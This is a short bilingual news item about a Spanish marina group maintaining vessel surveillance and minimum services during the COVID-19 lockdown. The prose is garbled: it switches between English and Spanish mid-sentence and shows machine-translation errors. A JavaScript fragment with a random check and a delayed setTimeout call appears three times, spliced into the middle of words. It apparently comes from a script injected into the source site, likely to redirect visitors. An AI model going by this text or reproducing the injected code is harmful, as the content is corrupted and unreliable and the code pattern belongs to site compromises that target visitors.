The Mediterranean Marines Group, under the Royal Decree-Law 10/2020, of 29 March, tightening confinement measures to curb COVID-19 expansion, reports that in the Estepona marinas, The Duchess And East Navy the surveillance and custody service for vessels that are in their berths continues to be maintained, tal y como se venía desarrollandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando desde el inicio del Estado de Alarma decretado por el Gobierno.
Although sports nautical traffic is prohibited, Manuel Raigon, managing director of the group, ports have the minimum services needed to ensure the maintenance of facilities and vessels, as well as to cover any emergency that may occur as a risk of sinking or temporary. These minimum services also include monitoring for no displacement of people through the facilities.
What has been paralyzed are the tasks of the boathouses until the next 9 April, unless further indicated by the authorities.
Raigón ha explicado que se está trabajandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando conjuntamente con el servicio marítimo de la Guardia Civil para seguir el protocolo establecido: communicate to them if any ships arrive with the intention of docking at one of the ports. And, in this case, crew members will not be able to disembark until they have permission from the competent authority.
El director gerente de Marinas del Mediterráneo ha destacado la labor que está llevandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando a cabo todo el personal en cada uno de los puertos y ha agradecido su labor, engagement and professionalism.